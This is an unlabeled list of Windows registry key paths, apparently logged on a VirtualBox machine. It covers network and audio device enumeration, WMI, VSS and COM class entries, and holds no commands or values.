HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceHandlers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\LastUpdateTime HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyCacheDate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\SW#{eeab7790-c514-11d1-b42b-00805fc1270e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyHwIdKey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{afd97640-86a3-4210-b67c-289c41aabe55} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\SYSTEM\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\SYSTEM\0000\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\BTH HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_AGILEVPNMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_L2TPMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANBH\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANIP\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANIPV6\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPPOEMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\FriendlyName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\DeviceDesc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Properties\{afd97640-86a3-4210-b67c-289c41aabe55} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\# HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\DeviceDesc HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{eb115ffc-10c8-4964-831d-6dcb02e6f23f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eheadphonewave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eHeadphoneWave\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eHeadphoneWave\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_8384&dev_7680&subsys_83847680&rev_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eheadphonetopo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_8384&dev_7680&subsys_83847680&rev_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eheadphonewave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneWave\Properties HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\Setup HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\WMI Writer HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax HKEY_LOCAL_MACHINE\Software\Classes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult HKEY_LOCAL_MACHINE\system\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\ProcessIdentifier HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47} 